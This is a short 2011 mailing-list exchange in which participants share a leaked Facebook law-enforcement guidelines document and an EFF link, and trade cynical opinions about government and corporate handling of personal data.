On Wed, May 4, 2011 at 8:55 AM, Cal Leeming c...@foxwhisper.co.uk wrote:
 +1.
 General rule of thumb (which has served me well), is that the govt +
 company who holds your info, can do whatever they want. Laws are bent and
 broken every single day by these people in charge. Sucks, I know, but that's
 the world we live in, I'm afraid ;/
Archive: The Case Against Retroactive Amnesty for Telecoms,
http://www.eff.org/issues/nsa-spying/archive.

You gotta be impressed with the US Congress. Not only are they not
held accountable for their actions, they spread the immunity around.


 On Wed, May 4, 2011 at 1:46 PM, valdis.kletni...@vt.edu wrote:

 On Wed, 04 May 2011 15:13:37 +0300, n...@myproxylists.com said:
   found this
   Facebook Law Enforcement Guidelines
  
   http://exit.gulli.com/url/http://info.publicintelligence.net/Facebook2010.pdf
  
 
  Interesting. Their guideline does not say anything about a court order
  so
  we can assume they give all personal data upon request just like that.

 Welcome to the real world.

 [SNIP]
